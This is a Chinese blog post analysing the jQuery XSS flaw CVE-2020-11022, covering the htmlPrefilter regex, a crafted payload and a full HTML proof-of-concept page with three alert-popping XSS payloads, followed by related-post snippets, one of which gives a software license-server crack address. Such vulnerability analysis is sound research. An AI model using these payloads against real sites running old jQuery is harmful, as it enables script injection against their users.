Jquery XSS漏洞(CVE-2020-11022)

最新推荐文章于 2025-03-20 19:30:06 发布
最新推荐文章于 2025-03-20 19:30:06 发布
阅读量2.5w 收藏 12
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41832837/article/details/113655878
版权
本文详细介绍了jQuery中存在的跨站脚本漏洞CVE-2020-11022,涉及1.2.0到3.5.0版本。攻击者能利用此漏洞执行客户端代码,通过不完整的HTML标签处理机制,构造特定payload绕过sanitize规则。提供了一个本地测试页面的利用示例,展示了如何通过.html()方法触发XSS弹窗。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞详情

jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。

漏洞影响

V 1.2.0 <= jquery < V 3.5.0

漏洞分析

在html()方法中,HTML字符串将作为参数传递到 $ .htmlPrefilter()方法进行处理。 $ .htmlPrefilter()方法用于替换自闭合标签,有点类似标签自动补全。比如将<span/> 替换为 <span></span>。

3.x版本之前使用的正则为:

rxhtmlTag =/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi
[...]
htmlPrefilter: function( html ) {
  return html.replace(rxhtmlTag, "<$1></$2>" );
}

3.x之后使用的正则为:

rxhtmlTag =/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi

因为这个特性可以构造适合jQuery3.x的payload如下:

<img alt="<x" title="/><img src=xοnerrοr=alert(1)>

因为这里的xss payload是作为属性出现,所以可以绕过sanitize规则。该payload使用html()方法执行后会变为:

<img alt="<x" title="/></x”><imgsrc=x οnerrοr=alert(1)>

该正则会将 x" 识别为标签,并新增 /x" 来闭合标签,从而执行XSS的payload。

image.png

漏洞利用

访问本地搭建好html测试页面

image.png

点击 Append via .html() 即可触发弹窗:

image.png

html页面POC代码如下:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script>
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>

<h2>PoC 1</h2>
<button οnclick="test(1)">Assign to innerHTML</button> <button οnclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x οnerrοr=alert(1)> 
</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button οnclick="test(2)">Assign to innerHTML</button> <button οnclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x οnerrοr=alert(1)>">
</xmp>

<h2>PoC 3</h2>
<button οnclick="test(3)">Assign to innerHTML</button> <button οnclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x οnerrοr=alert(1)></style>
</xmp>

<div id="div"></div>
</body>
</html>

参考:

https://mp.weixin.qq.com/s/QW5v5d7829m0Pz6AA6_XPQ

复现CVE-2020-11022/11023(jQuery XSS漏洞
记录并分享学习安全的知识点..
05-31 6917
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
Jquery XSS漏洞CVE-2020-11023)
jammny
02-04 7664
漏洞详情 针对CVE-2020-11022漏洞jQuery Team进行了修复。修复手段为将$.htmlPrefilter()方法替换为标识函数,因此传递的HTML字符串现在不再经过htmlPrefilter函数处理。但是这个修复方法仍有一些手段可以绕过,CVE-2020-11023就是针对CVE-2020-11022的绕过。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞详情 绕过使用的是另一个特性,某些特殊的标签在经过html()方法处理时,会由于HTML
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
jQuery最新xss漏洞浅析、复现、修复
最新发布
m0_59598029的博客
03-20 621
形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。危害:一旦注入恶意脚本后,攻击者就能够执行各种恶意活动。攻击者可能将私有信息(例如可能包含会话信息的 cookie)从受害者的机器传输给攻击者。攻击者可能以受害者的身份将恶意请求发送到Web 站点,如果受害者具有管理该站点的管理员特权,这可能对站点尤其危险。
2024年最全webstorm的安装及基本配置,2024最新物联网嵌入式开发高频精选面试题分享
2401_85015025的博客
05-14 660
择“License server”,然后在输入框中输入 License server address 为:http://hb5.s.osidea.cc:1017(有可能不能用,自己可以百度搜一下最新的)点击”Activate”按钮。人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**各种配置 可以根据自己的需求自行配置。7、开始基本配置 主要在。
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023)
热门推荐
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023)
JQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023)漏洞复现】
一纸荒芜的博客
10-31 2万+
jquery-xss漏洞复现
jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
2401_85013983的博客
05-14 1167
【代码】jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现。
Drupal漏洞复现:CVE-2019-6341
weixin_59086772的博客
12-30 2430
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
安全社区仍在探索在没有开放重定向的情况下是否仍能利用这个XSS漏洞。Vela鼓励其他人参与研究,以更全面地理解这个威胁。 总的来说,这个漏洞揭示了在开发过程中重视安全性和兼容性的挑战。对于使用jQuery Mobile的...
深入解析jQuery-XSS漏洞:安全防护与技术应用
gitblog_06578的博客
09-20 2158
深入解析jQuery-XSS漏洞:安全防护与技术应用 jQuery-XSS漏洞CVE-2020-11022CVE-2020-11023 项目地址: https://gitcode.com/Resource-Bundle-Coll...
jquery xss验证代码
08-13
jquery xss验证代码,以txt打开,修改http://xxx/jquery.js,保存后加载有问题的jquery,可以出现弹窗
Web安全-JQuery框架XSS漏洞浅析
道阻且长,行则将至
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
jQuery导致的XSS跨站漏洞
weixin_45908624的博客
11-17 5854
jQuery导致的XSS跨站漏洞
jQuery 的“原型污染”安全漏洞
weixin_33946605的博客
04-22 526
百度智能云·域名服务,.com新用户首购仅需25元 前两周发布的 jQuery 3.4.0 除了常规更新外,更...
jQuery3.0.0-3.5.0版本xss漏洞浅析、复现、修复
anlalu233的博客
07-22 5569
jQuery最新xss漏洞浅析、复现 2.1 环境搭建 对于此漏洞原作者搭建了在线环境,内置了三个xss poc,点击Append via .html()按钮即可触发xss 环境链接:https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 2.2 源码分析 先用第一个红框模拟个开发环境,虽然三个poc都使用了包含onerror事件的img标签,但其实它们是放在属性或style元素内部,因此会绕过HTML清理器。 审查元素发现,点击之后会多出现一个闭
jQuery XSS漏洞原因查找及解决方案
Galadridel的博客
06-11 2万+
测试网站是否存在此XSS跨站漏洞: 以google浏览器为例,打开要测试的网站,在Console窗口输入: $("element[attribute='<img src=123123 onerror=alert(123)>'"); 回车之后会出现弹窗,说明存在XSS跨站漏洞 解决方案:升级jquery版本1.10.2以上 升级之后如果还未修复,可能是其他的js包引起的,jqu...
cve-2020-11023复现
02-16
### 复现 CVE-2020-11023 漏洞 CVE-2020-11023 是 jQuery 中的一个跨站脚本攻击(XSS漏洞,该漏洞允许攻击者通过特定的输入注入恶意脚本并执行。为了安全研究的目的,在受控环境中复现此漏洞是非常重要的。 #### 准备工作 确保测试环境完全隔离于生产网络之外,并获得所有必要的授权许可。准备一个安装了受影响版本 jQuery 的 Web 应用程序作为目标系统[^1]。 #### 测试步骤 构建一个 HTML 页面,其中包含易受攻击的 jQuery 版本: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Test Page</title> <script src="https://code.jquery.com/jquery-3.5.0.min.js"></script> </head> <body> <script> $(document).ready(function(){ var input = "<img src=x onerror='alert(1);'>"; $(input).appendTo('body'); }); </script> </body> </html> ``` 上述代码展示了如何利用 `CVE-2020-11023` 进行 XSS 攻击。当页面加载时,会尝试创建一个新的 `<img>` 元素并将恶意 JavaScript 注入到文档流中,最终触发弹窗警告框显示数字 "1"。 请注意,实际操作过程中应严格遵循道德准则和法律法规,仅限于合法授权范围内开展此类实验活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值